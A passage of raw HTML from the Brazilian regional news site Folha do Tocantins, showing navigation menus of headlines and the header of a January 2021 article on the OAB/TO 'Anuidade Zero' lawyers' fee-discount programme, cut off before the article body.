src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-158-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-158-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-158-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Criada em 2009, &#8220;cápsula do tempo&#8221; da Defensoria será aberta nesta sexta-feira, 22</p></a></li><li><a href="https://folhadotocantins.com.br/senadores-querem-explicacoes-de-pazuello-e-guedes-sobre-enfrentamento-a-pandemia-fonte-agencia-senado/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-165-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-165-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-165-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Senadores querem explicações de Pazuello e Guedes sobre enfrentamento à pandemia  Fonte: Agência Senado</p></a></li><li><a href="https://folhadotocantins.com.br/governador-carlesse-discute-projetos-para-o-tocantins-com-diretores-do-banco-do-brasil/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-141-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-141-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-141-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Governador Carlesse discute projetos para o Tocantins com diretores do Banco do Brasil</p></a></li><li><a href="https://folhadotocantins.com.br/dorinha-viabiliza-obra-de-r-58-milhoes-para-acolher-mulheres-que-sofreram-violencia/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-144-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-144-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-144-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Dorinha viabiliza obra de R$ 5,8 milhões para acolher mulheres que sofreram violência</p></a></li></ul></div></div></li>
<li class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-51 mvp-mega-dropdown"><a href="https://folhadotocantins.com.br/curtas/">Curtas</a><div class="mvp-mega-dropdown"><div class="mvp-main-box"><ul class="mvp-mega-list"><li><a href="https://folhadotocantins.com.br/paulo-lima-assume-adapec-e-miuke-meio-ambiente-na-reforma-politica-de-carlesse/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/palmas-tocantins-noticias-de-tocantins-porto-nacional-noticias-do-tocantins-capital-do-tocantins-g1-tocantins-gurupi-55-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/palmas-tocantins-noticias-de-tocantins-porto-nacional-noticias-do-tocantins-capital-do-tocantins-g1-tocantins-gurupi-55-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/palmas-tocantins-noticias-de-tocantins-porto-nacional-noticias-do-tocantins-capital-do-tocantins-g1-tocantins-gurupi-55-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Paulo Lima assume Adapec e Miuke Meio Ambiente na reforma política de Carlesse</p></a></li><li><a href="https://folhadotocantins.com.br/cabral-transmite-proposta-do-governo-do-estado-a-ronivon-durante-sua-posse-e-elogia-iraja-abreu-senador-atuante/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-tocantins-estado-do-tocantins-16-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-tocantins-estado-do-tocantins-16-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-tocantins-estado-do-tocantins-16-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Cabral transmite proposta do governo do Estado à Ronivon durante sua posse e elogia Irajá Abreu: “Senador atuante”</p></a></li><li><a href="https://folhadotocantins.com.br/o-pros-tocantins-agora-tem-um-novo-presidente/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2019/01/politica-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2019/01/politica-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2019/01/politica-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>O PROS Tocantins agora têm um novo presidente</p></a></li><li><a href="https://folhadotocantins.com.br/nota-deputada-federal-dulce-miranda-sobre-apoio-ao-governo-do-tocantins/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2018/09/nota-deputada-federal-dulce-miranda-sobre-apoio-ao-governo-do-tocantins-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="Nota Deputada Federal Dulce Miranda sobre apoio ao Governo do Tocantins" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2018/09/nota-deputada-federal-dulce-miranda-sobre-apoio-ao-governo-do-tocantins-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2018/09/nota-deputada-federal-dulce-miranda-sobre-apoio-ao-governo-do-tocantins-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Nota Deputada Federal Dulce Miranda sobre apoio ao  Governo do Tocantins</p></a></li></ul></div></div></li>
<li class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-52 mvp-mega-dropdown"><a href="https://folhadotocantins.com.br/blog-ft/">Contexto Gospel</a><div class="mvp-mega-dropdown"><div class="mvp-main-box"><ul class="mvp-mega-list"><li><a href="https://folhadotocantins.com.br/mega-sena-acumula-e-proximo-concurso-deve-pagar-r-10-milhoes/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2020/01/777-42-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2020/01/777-42-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2020/01/777-42-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Mega-Sena acumula e próximo concurso deve pagar R$ 10 milhões</p></a></li><li><a href="https://folhadotocantins.com.br/ministerio-sarando-a-terra-ferida-estara-no-comag-2019-confira-o-perfil-da-banda/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2019/01/untitled-1-3-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2019/01/untitled-1-3-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2019/01/untitled-1-3-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Ministério Sarando a Terra Ferida estará no COMAG 2019; Confira o perfil da banda</p></a></li><li><a href="https://folhadotocantins.com.br/bolsonaro-tem-que-ser-macho-diz-malafaia-sobre-ameacas-arabes-contra-embaixada-em-jerusalem/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2019/01/01-20-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2019/01/01-20-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2019/01/01-20-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>“Bolsonaro tem que ser macho”, diz Malafaia sobre ameaças árabes contra embaixada em Jerusalém</p></a></li><li><a href="https://folhadotocantins.com.br/igreja-batista-ebenezer-de-gurupi-um-breve-historico/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2019/01/01-13-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2019/01/01-13-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2019/01/01-13-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Igreja Batista Ebenézer de Gurupi: um breve histórico</p></a></li><li><a href="https://folhadotocantins.com.br/nada-a-perder-historia-do-bispo-macedo-so-perde-para-vingadores/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2019/01/01-19-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2019/01/01-19-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2019/01/01-19-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>‘Nada a Perder’: história do bispo Macedo só perde para ‘Vingadores’</p></a></li></ul></div></div></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-60 mvp-mega-dropdown"><a href="https://folhadotocantins.com.br/policia/">Polícia</a><div class="mvp-mega-dropdown"><div class="mvp-main-box"><ul class="mvp-mega-list"><li><a href="https://folhadotocantins.com.br/sistema-penal-do-tocantins-lanca-campanha-de-combate-a-covid-19/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-159-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-159-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-159-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Sistema Penal do Tocantins lança campanha de combate à Covid-19</p></a></li><li><a href="https://folhadotocantins.com.br/149849-2/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-136-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-136-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-136-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Seis indivíduos são detidos  pela PM em Porto Nacional pelos crimes de furto de veículo, receptação e tráfico de drogas</p></a></li><li><a href="https://folhadotocantins.com.br/homem-e-preso-pela-pm-por-estupro-de-vulneravel-em-porto-nacional/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-137-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-137-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-137-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Homem é preso pela PM por estupro de vulnerável em Porto Nacional</p></a></li><li><a href="https://folhadotocantins.com.br/em-porto-nacional-pm-prende-autor-de-roubo-a-transeunte-e-recupera-veiculo-roubado/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/palmas-tocantins-noticias-de-tocantins-porto-nacional-noticias-do-tocantins-capital-do-tocantins-g1-tocantins-gurupi-67-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/palmas-tocantins-noticias-de-tocantins-porto-nacional-noticias-do-tocantins-capital-do-tocantins-g1-tocantins-gurupi-67-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/palmas-tocantins-noticias-de-tocantins-porto-nacional-noticias-do-tocantins-capital-do-tocantins-g1-tocantins-gurupi-67-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Em Porto Nacional PM prende autor de roubo a transeunte e recupera veículo roubado</p></a></li><li><a href="https://folhadotocantins.com.br/bombeiros-militares-atendem-varias-ocorrencias-de-acidente-de-transito-no-fim-de-semana/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/palmas-tocantins-noticias-de-tocantins-porto-nacional-noticias-do-tocantins-capital-do-tocantins-g1-tocantins-gurupi-43-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/palmas-tocantins-noticias-de-tocantins-porto-nacional-noticias-do-tocantins-capital-do-tocantins-g1-tocantins-gurupi-43-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/palmas-tocantins-noticias-de-tocantins-porto-nacional-noticias-do-tocantins-capital-do-tocantins-g1-tocantins-gurupi-43-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Bombeiros Militares atendem várias ocorrências de acidente de trânsito no fim de semana</p></a></li></ul></div></div></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-283 mvp-mega-dropdown"><a href="https://folhadotocantins.com.br/videos/">Cinema</a><div class="mvp-mega-dropdown"><div class="mvp-main-box"><ul class="mvp-mega-list"><li><a href="https://folhadotocantins.com.br/as-entidades-cosmicas-mais-poderosas-da-marvel-2/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2020/10/001-29-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2020/10/001-29-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2020/10/001-29-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>AS ENTIDADES CÓSMICAS MAIS PODEROSAS DA MARVEL</p></a></li><li><a href="https://folhadotocantins.com.br/informante-revela-como-sera-o-filme-do-quarteto-fantastico-no-ucm-2/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2020/10/001-30-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2020/10/001-30-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2020/10/001-30-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>INFORMANTE REVELA COMO SERÁ O FILME DO QUARTETO FANTÁSTICO NO UCM</p></a></li><li><a href="https://folhadotocantins.com.br/tenten-pode-derrotar-o-isshiki-veja-como/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2020/07/001-1-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2020/07/001-1-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2020/07/001-1-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /><div class="mvp-vid-box-wrap mvp-vid-box-small mvp-vid-marg-small"><i class="fa fa-play fa-3"></i></div></div><p>TENTEN PODE DERROTAR O ISSHIKI: VEJA COMO</p></a></li><li><a href="https://folhadotocantins.com.br/o-batman-cantou-pra-salvar-a-diana-veja-como-foi/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2020/07/001-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2020/07/001-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2020/07/001-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /><div class="mvp-vid-box-wrap mvp-vid-box-small mvp-vid-marg-small"><i class="fa fa-play fa-3"></i></div></div><p>O BATMAN CANTOU PRA SALVAR A DIANA &#8211; VEJA COMO FOI</p></a></li><li><a href="https://folhadotocantins.com.br/os-10-kinjutsus-mais-poderosos-de-naruto-rankeados-por-poder/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2020/07/001-2-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2020/07/001-2-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2020/07/001-2-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /><div class="mvp-vid-box-wrap mvp-vid-box-small mvp-vid-marg-small"><i class="fa fa-play fa-3"></i></div></div><p>OS 10 KINJUTSUS MAIS PODEROSOS DE NARUTO (rankeados por poder)</p></a></li></ul></div></div></li>
</ul></div>															</div><!--mvp-nav-menu-->
														</div><!--mvp-nav-bot-left-in-->
													</div><!--mvp-nav-bot-left-out-->
												</div><!--mvp-nav-bot-cont-->
											</div><!--mvp-nav-bot-right-in-->
											<div class="mvp-nav-bot-right left relative">
												<span class="mvp-nav-search-but fa fa-search fa-2 mvp-search-click"></span>
											</div><!--mvp-nav-bot-right-->
										</div><!--mvp-nav-bot-right-out-->
									</div><!--mvp-nav-bot-wrap-->
								</div><!--mvp-main-nav-bot-cont-->
							</div><!--mvp-main-box-->
						</div><!--mvp-main-nav-bot-->
					</nav><!--mvp-main-nav-wrap-->
							</header><!--mvp-main-head-wrap-->
			<div id="mvp-main-body-wrap" class="left relative">	<article id="mvp-article-wrap" itemscope itemtype="http://schema.org/NewsArticle">
			<meta itemscope itemprop="mainEntityOfPage"  itemType="https://schema.org/WebPage" itemid="https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/"/>
						<div id="mvp-article-cont" class="left relative">
			<div class="mvp-main-box">
				<div id="mvp-post-main" class="left relative">
										<div class="mvp-post-main-out left relative">
						<div class="mvp-post-main-in">
							<div id="mvp-post-content" class="left relative">
																	<header id="mvp-post-head" class="left relative">
										<h3 class="mvp-post-cat left relative"><a class="mvp-post-cat-link" href="https://folhadotocantins.com.br/cidades/"><span class="mvp-post-cat left">Cidades</span></a></h3>
										<h1 class="mvp-post-title left entry-title" itemprop="headline">OAB/TO: Anuidade Zero: 3,1 mil advogados e advogadas aderem programa e terão desconto em 2021</h1>
																					<span class="mvp-post-excerpt left"><div style='clear: both'></div><div  class='the_champ_sharing_container the_champ_horizontal_sharing' super-socializer-data-href="https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/"><div class='the_champ_sharing_title' style="font-weight:bold" ></div><ul class="the_champ_sharing_ul"><li class="theChampSharingRound"><i style="width:40px;height:40px;border-radius:5px;" alt="Whatsapp" Title="Whatsapp" class="theChampSharing theChampWhatsappBackground" onclick='theChampPopup("https://web.whatsapp.com/send?text=OAB%2FTO%3A%20Anuidade%20Zero%3A%203%2C1%20mil%20advogados%20e%20advogadas%20aderem%20programa%20e%20ter%C3%A3o%20desconto%20em%202021 https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F")'><ss style="display:block" class="theChampSharingSvg theChampWhatsappSvg"></ss></i></li><li class="theChampSharingRound"><i style="width:40px;height:40px;border-radius:5px;" alt="Facebook" Title="Facebook" class="theChampSharing theChampFacebookBackground" onclick='theChampPopup("https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F")'><ss style="display:block;" class="theChampSharingSvg theChampFacebookSvg"></ss></i></li><li class="theChampSharingRound"><i style="width:40px;height:40px;border-radius:5px;" alt="Facebook Messenger" Title="Facebook Messenger" class="theChampSharing theChampFacebookMessengerBackground" onclick='theChampPopup("https://www.facebook.com/dialog/send?app_id=595489497242932&display=popup&link=https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F&redirect_uri=https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F")'><ss style="display:block;" class="theChampSharingSvg theChampFacebookMessengerSvg"></ss></i></li><li class="theChampSharingRound"><i style="width:40px;height:40px;border-radius:5px;" alt="Twitter" Title="Twitter" class="theChampSharing theChampTwitterBackground" onclick='theChampPopup("http://twitter.com/intent/tweet?text=OAB%2FTO%3A%20Anuidade%20Zero%3A%203%2C1%20mil%20advogados%20e%20advogadas%20aderem%20programa%20e%20ter%C3%A3o%20desconto%20em%202021&url=https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F")'><ss style="display:block;" class="theChampSharingSvg theChampTwitterSvg"></ss></i></li><li class="theChampSharingRound"><i style="width:40px;height:40px;border-radius:5px;" alt="Copy Link" Title="Copy Link" class="theChampSharing theChampCopyLinkBackground"><ss style="display:block;" class="theChampSharingSvg theChampCopyLinkSvg"></ss></i></li><li class="theChampSharingRound"><i style="width:40px;height:40px;border-radius:5px;" title="More" alt="More" class="theChampSharing theChampMoreBackground" onclick="theChampMoreSharingPopup(this, 'https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/', 'OAB%2FTO%3A%20Anuidade%20Zero%3A%203%2C1%20mil%20advogados%20e%20advogadas%20aderem%20programa%20e%20ter%C3%A3o%20desconto%20em%202021', '')" ><ss style="display:block" class="theChampSharingSvg theChampMoreSvg"></ss></i></li></ul><div style="clear:both"></div></div><div style='clear: both'></div><p>Um advogado acumulou mais de R$ 3 mil em cash back com o programa. Saldo acumulado é o bastante para pagar três anuidades</p>
<div class='the_champ_sharing_container the_champ_vertical_sharing the_champ_hide_sharing the_champ_bottom_sharing' style='width:44px;left: -10px;top: 100px;-webkit-box-shadow:none;box-shadow:none;' super-socializer-data-href="https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/"><ul class="the_champ_sharing_ul"><li class=""><i style="width:40px;height:40px;margin:0;" alt="Facebook" Title="Facebook" class="theChampSharing theChampFacebookBackground" onclick='theChampPopup("https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F")'><ss style="display:block;" class="theChampSharingSvg theChampFacebookSvg"></ss></i></li><li class=""><i style="width:40px;height:40px;margin:0;" alt="Whatsapp" Title="Whatsapp" class="theChampSharing theChampWhatsappBackground" onclick='theChampPopup("https://web.whatsapp.com/send?text=OAB%2FTO%3A%20Anuidade%20Zero%3A%203%2C1%20mil%20advogados%20e%20advogadas%20aderem%20programa%20e%20ter%C3%A3o%20desconto%20em%202021 https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F")'><ss style="display:block" class="theChampSharingSvg theChampWhatsappSvg"></ss></i></li><li class=""><i style="width:40px;height:40px;margin:0;" alt="Twitter" Title="Twitter" class="theChampSharing theChampTwitterBackground" onclick='theChampPopup("http://twitter.com/intent/tweet?text=OAB%2FTO%3A%20Anuidade%20Zero%3A%203%2C1%20mil%20advogados%20e%20advogadas%20aderem%20programa%20e%20ter%C3%A3o%20desconto%20em%202021&url=https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F")'><ss style="display:block;" class="theChampSharingSvg theChampTwitterSvg"></ss></i></li></ul><div style="clear:both"></div></div></span>
																															<div class="mvp-author-info-wrap left relative">
												<div class="mvp-author-info-thumb left relative">
													<img alt='' src='https://secure.gravatar.com/avatar/cc286a23afa12a894f6d034d1c494d70?s=46&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/cc286a23afa12a894f6d034d1c494d70?s=92&#038;d=mm&#038;r=g 2x' class='avatar avatar-46 photo' height='46' width='46' loading='lazy'/>												</div><!--mvp-author-info-thumb-->
												<div class="mvp-author-info-text left relative">
													<div class="mvp-author-info-date left relative">
														<p>Published</p> <span class="mvp-post-date">7 horas ago</span> <p>on</p> <span class="mvp-post-date updated"><time class="post-date updated" itemprop="datePublished" datetime="2021-01-21">21/01/2021</time></span>
														<meta itemprop="dateModified" content="2021-01-21"/>
													</div><!--mvp-author-info-date-->
													<div class="mvp-author-info-name left relative" itemprop="author" itemscope itemtype="https://schema.org/Person">
														<p>By</p> <span class="author-name vcard fn author" itemprop="name"><a href="https://folhadotocantins.com.br/author/folhadotocantins/" title="Posts de Folha do Tocantins" rel="author">Folha do Tocantins</a></span> 													</div><!--mvp-author-info-name-->
												</div><!--mvp-author-info-text-->
											</div><!--mvp-author-info-wrap-->
																			</header>
																																																														<div id="mvp-post-feat-img" class="left relative mvp-post-feat-img-wide2" itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
												<img width="900" height="600" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163.jpg" class="attachment- size- wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163.jpg 900w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163-300x200.jpg 300w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163-768x512.jpg 768w" sizes="(max-width: 900px) 100vw, 900px" />																								<meta itemprop="url" 